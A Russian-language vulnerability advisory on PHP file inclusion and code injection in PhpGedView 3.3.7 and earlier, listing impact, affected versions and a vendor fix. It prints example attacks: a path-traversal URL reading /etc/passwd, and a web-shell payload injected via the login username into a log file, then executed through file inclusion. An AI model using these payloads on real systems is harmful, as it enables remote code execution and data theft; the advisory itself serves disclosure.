PHP инклюдинг в PhpGedView

Дата публикации:
26.12.2005
Всего просмотров:
3001
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PhpGedView 2.x
PhpGedView 3.x
Уязвимые версии: PhpGedView 3.3.7 и более ранние версии

Описание:
Обнаруженные Уязвимости позволяют удаленному пользователю получить доступ к важным данным и выполнить произвольный PHP сценарий на системе.

1. Отсутствует фильтрация входных данных в параметре "PGV_BASE_DIRECTORY" в сценарии "help_text_vars.php". Удаленный пользователь может подключить произвольные файлы на системе. Удачная эксплуатация уязвимости возможна при включено опции "register_globals". Пример:

http://[target]/[path]/help_text_vars.php?
PGV_BASE_DIRECTORY=../../../../../../../etc/passwd
2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "user_language", "user_email" и "user_gedcomid" в сценарии "authenticate.php". Удаленный пользователь может выполнить произвольный PHP код на системе. Для удачной эксплуатации уязвимости требуется, чтобы опция "magic_quotes_gpc" была отключена. Пример:

Пытаемся войти в систему таким образом:
username: <?php system($_GET[cmd]);?>
password: [nothing]

Затем:
http://[target]/[path]/help_text_vars.php?cmd=ls%20-la&
PGV_BASE_DIRECTORY=./index/pgv-200512.log

URL производителя: phpgedview.sourceforge.net

Решение: Установите исправление с сайта производителя.

Источник:

Ссылки: PHPGedView <= 3.3.7 Arbitrary local/remote code execution & php injection

или введите имя

CAPTCHA